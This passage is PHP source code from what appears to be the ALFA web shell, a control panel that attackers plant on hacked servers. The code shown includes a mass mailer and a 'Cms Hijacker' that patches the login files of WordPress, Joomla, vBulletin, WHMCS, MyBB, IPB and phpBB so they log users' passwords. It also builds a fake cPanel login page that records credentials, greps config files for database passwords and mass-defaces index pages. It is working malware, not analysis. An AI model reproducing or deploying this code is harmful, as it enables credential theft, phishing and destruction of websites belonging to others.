$mail_content .= "Content-Transfer-Encoding: base64\r\n";
$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
$mail_content .= $content."\r\n\r\n";
$mail_content .= "--".$uid."--";
}else{
$headers  = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
}
if(empty($count_mail)||$count_mail<1)$count_mail=1;
if(!empty($mail_from)){echo __pre();
for($i=1;$i<=$count_mail;$i++){
if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("
Sent -> $mail_to
");
}}else{__alert("Invalid Mail From !");}
}else{__alert("Invalid Mail To !");}
}
echo('
');
alfafooter();
}
function alfaziper(){
alfahead();
AlfaNum(8,9,10);
echo '

| Compressor |


>\');return false;" method="post">
Dir/File:

Save Dir:


';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
echo __pre().'

Done -> '.$zipfile.'

';
}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
echo __pre().'

Done -> '.$zipfile.'

';
}elseif(class_exists('ZipArchive')){
if(__alfaziper($dirzip, $zipfile)){
echo __pre().'

Success...!
'.$zipfile.'

';
}else{echo __pre().'

ERROR!!!...

';}
}
}
echo '
';
alfafooter();
}
function __alfaziper($source,$destination){
    if(!extension_loaded('zip')||!file_exists($source)){
        return false;
    }
    $zip=new ZipArchive();
    if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
        return false;
    }
    $source=str_replace('\\','/',realpath($source));
    if(is_dir($source)===true){
        $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
        foreach($files as $file){
            $file=str_replace('\\','/',$file);
            if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
            $file=realpath($file);
            if(is_dir($file)===true){
                $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
            }else if(is_file($file)===true){
                $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
            }
        }
    }else if(is_file($source)===true){
        $zip->addFromString(basename($source),file_get_contents($source));
    }
    return $zip->close();
}
function alfadeziper(){
alfahead();
AlfaNum(8,9,10);
echo '

| DeCompressor |


>\');return false;" method="post">
File:

Extract To:


';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if(@!is_dir($zipfile)){
    @mkdir($zipfile, 0777, true);
}
$finfo = "";
$file_type = "";
if(function_exists('finfo_open')){
$finfo = @finfo_open(FILEINFO_MIME_TYPE);
$file_type = @finfo_file($finfo, $dirzip);
@finfo_close($finfo);
}else{
    if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
        $file_type = alfaEx('file -b --mime-type ' . $dirzip);
    }
}
if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
echo __pre().'

Done -> '.$zipfile.'

';
}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
switch ($file_type) {
    case 'application/zip':
        alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
    break;
    case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
        if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
            alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
        }else{
            alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
        }
    break;
}
echo __pre().'

Done -> '.$zipfile.' [ View Folder ]

';
}elseif(class_exists('ZipArchive')){
    $itsok = false;
    if(emtpy($file_type)){
        $file_type = "application/zip";
    }
    switch ($file_type) {
        case 'application/zip':
            $zip = new ZipArchive;
            $res = $zip->open($dirzip);
            if ($res) {
                $zip->extractTo($zipfile);
                $zip->close();
                $itsok = true;
            }
        break;
        case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
            if(strstr(basename($dirzip), ".tar.gz")){
                $new_file = $zipfile .'/'. basename($dirzip);
                @copy($dirzip, $new_file);
                $new_tar = str_replace(".tar.gz", ".tar", $new_file);
                try {
                    $p = new PharData($new_file);
                    $p->decompress();
                    $phar = new PharData($new_tar);
                    $phar->extractTo($zipfile);
                    @unlink($new_file);
                    @unlink($new_tar);
                    $itsok = true;
                } catch (Exception $e) {
                }
            }else{
                try {
                    $phar = new PharData($dirzip);
                    $phar->extractTo($zipfile);
                    $itsok = true;
                } catch (Exception $e) {
                }
            }
        break;
    }
if($itsok){
echo __pre().'

Success...!
'.$zipfile.' [ View Folder ]

';
}else{echo __pre().'

ERROR!!!...

';}
}
}
echo '
';
alfafooter();
}
function alfacmshijacker(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo '


| Cms Hijacker |


>\',this.cmspath.value);return false;" method=\'post\'>
CMS: ");
echo ' Path installed cms:
SaveTo:

';
$cms = $_POST['alfa1'];
$saveto = $_POST['alfa2'];
$cmspath = $_POST['alfa4'];
if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
echo __pre();
alfaHijackCms($cms,$cmspath,$saveto);
}
echo '
';
alfafooter();
}
function alfaHijackCms($cms,$cmspath,$saveto){
switch($cms){
case "vb":
hijackvBulletin($cmspath,$saveto);
break;
case "wp":
hijackwp($cmspath,$saveto);
break;
case "jom":
hijackJoomla($cmspath,$saveto);
break;
case "whmcs":
hijackWhmcs($cmspath,$saveto);
break;
case "mybb":
hijackMybb($cmspath,$saveto);
break;
case "ipb":
hijackIPB($cmspath,$saveto);
break;
case "phpbb":
hijackPHPBB($cmspath,$saveto);
break;
default:
echo "error!";
break;
}
}
function hijackvBulletin($path,$saveto){
$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
$code=str_replace('{saveto_path}',$saveto,$code);
$login = $path."/login.php";
$class = $path."/includes/class_bootstrap.php";
$dologin = 'do_login_redirect();';
$evil_login = "\t".$code."\n\t".$dologin;
$evil_class = "true";
if((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){
$data_login = @file_get_contents($login);
$data_class = @file_get_contents($class);
if(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){
$login_replace = str_replace($dologin,$evil_login, $data_login);
$class_replace = str_replace($clearpw,$evil_class, $data_class);
@file_put_contents($login, $login_replace);
@file_put_contents($class, $class_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackwp($path,$saveto){
$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/wp-login.php";
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(@preg_match($redirect_wp, $data_login, $match)){
$evil_login = "\t".$match[0]."\n\t".$code;
$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackJoomla($path,$saveto){
$code = '$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$comp=$path."/administrator/components/com_login/";
if(@is_file($comp."/login.php")){
$login = $comp."/login.php";
}elseif(@is_file($comp."/admin.login.php")){
$login = $comp."/admin.login.php";
}else{
$login = '';
}
if(@is_file($login) AND @is_writable($login) AND $login != ''){
$data_login = @file_get_contents($login);
$evil_login = $code."\n".$data_login;
@file_put_contents($login, $evil_login);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackWhmcs($path,$saveto){
$code = ' 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$conf=$path."/configuration.php";
if(@is_file($conf) AND @is_writable($conf)){
$data_conf = @file_get_contents($conf);
if(!strstr($data_conf,'?>'))$code = '?>'.$code;
$evil_conf = $data_conf."\n".$code;
@file_put_contents($conf, $evil_conf);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackMybb($path,$saveto){
$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
$find = '$loginhandler->complete_login();';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/member.php";
$evil_login = "\t".$code."\n\t".$find;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackIPB($path,$saveto){
$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$find = 'unset( $member[\'plainPassword\'] );';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/admin/sources/handlers/han_login.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackPHPBB($path,$saveto){
$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$find = 'case \'login\':';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/ucp.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackOutput($c=0,$p=''){echo($c==0?"
Success --> path: $p
":'
Error in inject code !
');}
function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
if(@is_dir($dir)){
$files=@scandir($dir);
foreach($files as $key => $value){
$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
if(!@is_dir($path)){
if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
if($e=='str'){
$content = @file_get_contents($path);
if(strpos($content, $string) !== false){
echo str_replace('\\','/',$path) . "
";
}
}else{
if(strstr($value,$string)){
echo str_replace('\\','/',$path) . "
";
}
}
$results[] = $path;
}elseif($value != "." && $value != "..") {
Alfa_StrSearcher($path,$string,$ext,$e,$results);
$results[] = $path;
}}}}
function alfafakepage(){
    alfahead();
    AlfaNum(9,10);
    echo '


    
| Host Manager Fake page |


>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
    
Panel:
");
    echo '
Clone page:

    
Fake page root:

    
Inject to:

    
Bind on:

    
Log To:

    
Count of Invalid login:

    

';
    $clone_page = $_POST['alfa1'];
    $fake_root = $_POST['alfa2'];
    $logto = $_POST['alfa4'];
    $panel = $_POST['alfa5'];
    $inject_to = $_POST['alfa6'];
    $bind_on = $_POST['alfa7'];
    $count = $_POST['alfa8'];
    if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
        echo __pre();
        $target = $clone_page;
        $curl = new AlfaCURL();
        $source_page = $curl->Send($target);
        if(!empty($source_page)){
            $matched_form = "";
            if($panel == "cpanel"){
                if(preg_match('##', $source_page, $match)){
                    $matched_form = $match[0];
                }
            }else{
                if(preg_match('##', $source_page, $match)){
                    $matched_form = $match[0];
                }
            }
            if(!empty($matched_form)){
                $fake = "";
                $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
                $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
                if($panel == "cpanel"){
                    $port = "2083";
                }else{
                    $target = str_replace(array("http://", "https://"), "", $target);
                    $port = explode(":",$target);
                    $port = $port[1];
                }
                if(substr($uri, 0, 1) == "/"){
                    $uri = substr($uri, 1);
                }
                $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
                $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
                if($panel == "cpanel"){
                    $form = '
';
                }else{
                    $form = '';
                }
                $fake = str_replace($matched_form, $form, $source_page);
                if(@!is_dir($fake_root)){
                    @mkdir($fake_root, 0777, true);
                }

                $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);

                $post_user = 'user';
                $post_pass = 'pass';
                $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
                if($panel != "cpanel"){
                    $post_user = 'username';
                    $post_pass = 'password';
                    $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
                }

                $cpanel_log = ''.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';

                @file_put_contents($fake_root.'/log.php', $cpanel_log);

                if($panel == "cpanel"){
                    $fake = preg_replace(array('##', '##', '# #'), array('', '', ''), $fake);
                }

                @file_put_contents($fake_root.'/index.php', $fake);

                $inject_code = '';
                $bind_on_code = '';

                @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
                @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));

                echo "success...!";
            }else{
                echo "failed...!";
            }
        }else{
            echo("

Cannot open the target...!
");
        }
    }
    echo '
';
    alfafooter();
}
function alfaarchive_manager(){
    alfahead();
    $file = $_POST['alfa2'];
    if(!file_exists($file)){
        $file = $GLOBALS['cwd'];
    }
    $rand_id = rand(9999, 999999);
    echo '

| Archive Manager |

';
    echo '>\');return false;" method=\'post\'>
    

    Archive file:
    

';
    if($_POST['alfa5']=='>>'){
        //echo __pre();
        echo '
';
        echo '
';
        __alfa_open_archive_file($file, $rand_id);
        echo '
';
    }
    echo '
';
    alfafooter();
}
function __alfa_open_archive_file($arch, $base_id=0){
    try{
        $files = array();
        $dirs = array();
        $archive = new PharData($arch);
         foreach($archive as $file) {
             $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
             if($file->isDir()) {
                 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
             }else{
                 $file_size = @filesize($file->getPathname());
                 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file",  "modify" => $file_modify, "size" => $file_size);
             }
         }
         function __alfa_open_archive_usort($a, $b){
             return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
         }
         usort($dirs, "__alfa_open_archive_usort");
         usort($files, "__alfa_open_archive_usort");
         $files = array_merge($dirs, $files);
         echo '';
         $icon = '';
         echo '';
         foreach($files as $file){
             $icon = '';
             if($file["type"] == "dir"){
                 echo '';
             }else{
                echo "";

            }
         }
          echo '

NameSizeModifyActions
'.$icon.'| .. |dir--
'.$icon.'| '.$file["name"].' |dir'.$file["modify"].'-
".$icon."".$file["name"]."".alfaSize($file["size"])."".$file["modify"]."-
';
    }catch(Exception $e){
        echo("0");
    }
}
function alfaopen_archive_dir(){
    $dir = $_POST["alfa1"];
    $base_id = $_POST["alfa2"];
    __alfa_open_archive_file($dir, $base_id);
}
function alfaconfig_grabber(){
    alfahead();
    echo '

| Config Grabber |

';
    echo '
>\');return false;" method=\'post\'>
    

    Dir:
    Ext: [ * = all Ext ]
    

';
    $dir = $_POST['alfa2'];
    $ext = $_POST['alfa3'];
    if($_POST['alfa5']=='>>'){
        echo __pre();
        Alfa_ConfigGrabber($dir, $ext);
    }
    echo '
';
    alfafooter();
}
function Alfa_ConfigGrabber($dir, $ext) {
    $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
    $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
    if(@is_readable($dir)){
        $globFiles = @glob("$dir/*.$ext");
        $globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
        $blacklist = array();
        foreach ($globDirs as $dir) {
            if(!@is_readable($dir)||@is_link($dir)) continue;
            @Alfa_ConfigGrabber($dir, $ext);
        }
        foreach ($globFiles as $file){
            $filee = @file_get_contents($file);
            if(preg_match($pattern, $filee)){
                echo "";
            }
        }
    }
}
function alfasearcher(){
alfahead();
echo '

| Searcher |

| Find Readable Or Writable Files | | Find Files By Name |

';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
echo '
| Find Readable Or Writable Files  |


>\');return false;" method=\'post\'>

Method:
Dir:
Ext: [ * = all Ext ]

';
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
$method = $_POST['alfa4'];
if($_POST['alfa5']=='>>'){
echo __pre();
if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
Alfa_Searcher($dir,trim($ext),$method);
}
}
if($_POST['alfa1']=='str'){
echo '
| Find Files By Name / Find String In Files |


>\',this.ext.value,this.method.value);return false;" method=\'post\'>

Method:
String:
Dir:
Ext: [ * = all Ext ]

';
$dir = $_POST['alfa2'];
$string = $_POST['alfa3'];
$ext = $_POST['alfa5'];
if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
echo __pre();
Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
}
}
echo '
';
alfafooter();
}
function alfaMassDefacer(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo "

| Mass Defacer |

>');return false;\" method='post'>";
echo '
Deface Method:
    Mass dir:
    DefPage:


';
$dir = $_POST['alfa1'];
$defpage = $_POST['alfa2'];
$method = $_POST['alfa3'];
$fCurrent = $GLOBALS['__file_path'];
if($_POST['alfa4'] == '>>'){
if(!empty($dir)){
if(@is_dir($dir)){
if(@is_readable($dir)){
if(@is_file($defpage)){
if($dh = @opendir($dir)){
echo __pre();
while (($file = @readdir($dh)) !== false){
if($file == '..' || $file == '.')continue;
$newfile=$dir.$file;
if($fCurrent == $newfile)continue;
if(@is_dir($newfile)){
Alfa_ReadDir($newfile,$method,$defpage);
}else{
if(!@is_writable($newfile))continue;
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}else{__alert('Error In OpenDir...');}
}else{__alert('DefPage File NotFound...');}
}else{__alert('Directory is not Readable...');}
}else{__alert('Mass Dir is Invalid Dir...');}
}else{__alert('Dir is Empty...');}
}
echo '
';
alfafooter();
}
function Alfa_ReadDir($dir,$method='',$defpage=''){
if(!@is_readable($dir)) return false;
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while(($file=readdir($dh))!==false) {
if($file == '..' || $file == '.')continue;
$newfile=$dir.'/'.$file;
if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
if(@is_file($newfile)){
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
if(!@is_writable($dir)) return false;
if(!@is_readable($dir)) return false;
$defpage=@file_get_contents($defpage);
if($m == 'index'){
$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
if(in_array(strtolower($file),$indexs)){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."DeFaced...
" : '';
}
}elseif($m=='all'){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."  DeFaced...
" : '';
}
}
function alfaGetDisFunc(){
alfahead();
echo '
';
$disfun = @ini_get('disable_functions');
$s = explode(',',$disfun);
$f = array_unique($s);
echo '

Disable Functions
';

$i=1;

foreach($f as $s){

$s=trim($s);

if(function_exists($s)||!is_callable($s))continue;

echo '';

echo '';

$i++;

}

echo '
#Func Name
'.$i.''.$s.'
';
echo '
';
alfafooter();
}
function Alfa_Create_A_Tag($action,$vals){
$nulls = array();
foreach($vals as $key => $val){
echo '| '.$key.' | ';
unset($nulls);
}
}
function Alfa_Searcher($dir, $ext, $method) {
if(@is_readable($dir)){
if($method == 'all')$ext = '*';
if($method == 'dirs')$ext = '*';
$globFiles = @glob("$dir/*.$ext");
$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)||@is_link($dir)) continue;
@Alfa_Searcher($dir, $ext, $method);
}
switch($method){
case "files":
foreach ($globFiles as $file){
if(@is_writable($file)){
echo "$file
";
}
}
break;
case "dirs":
foreach ($globFiles as $file){
if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
echo dirname($file).'
';
$blacklist[] = dirname($file);
}
}
break;
case "all":
foreach ($globFiles as $file){
echo $file.'
';
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f,$width='100%',$height='600px'){
return('');
}
class AlfaCURL {
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = true;
public $curl_status = true;
function __construct($cookies=false,$compression='gzip',$proxy=''){
if(!extension_loaded('curl')){$curl_status = false;return false;}
$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if($this->cookies)$this->cookie($this->path);
}
function cookie($cookie_file) {
if (_alfa_file_exists($cookie_file,false)) {
$this->cookie_file=$cookie_file;
}else{
@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
$this->cookie_file=$cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url,$method="get",$data=""){
if(!$this->curl_status){return false;}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if($this->ssl){
curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
}
if($this->cookies){
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if($this->proxy){
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if($method=='post'){
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$return = @curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo "
cURL Error
$error
";
die;
}
}
function getConfigHtml($cms){
$content = '';
$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
$content .= "
Cms:
Path(installed cms/Config):
";
$content .= "
";
return $content;
}
if (!function_exists('json_encode')){
    function json_encode($a=false){
        if (is_null($a)) return 'null';
        if ($a === false) return 'false';
        if ($a === true) return 'true';
        if (is_scalar($a))
        {
            if (is_float($a))
            {
                return floatval(str_replace(",", ".", strval($a)));
            }

            if (is_string($a))
            {
                static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
                return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
            }
            else
            return $a;
        }
        $isList = true;
        for ($i = 0, reset($a); $i < count($a); $i++, next($a))
        {
            if (key($a) !== $i)
            {
                $isList = false;
                break;
            }
        }
        $result = array();
        if ($isList)
        {
            foreach ($a as $v) $result[] = json_encode($v);
            return '[' . join(',', $result) . ']';
        }
        else
        {
            foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
            return '{' . join(',', $result) . '}';
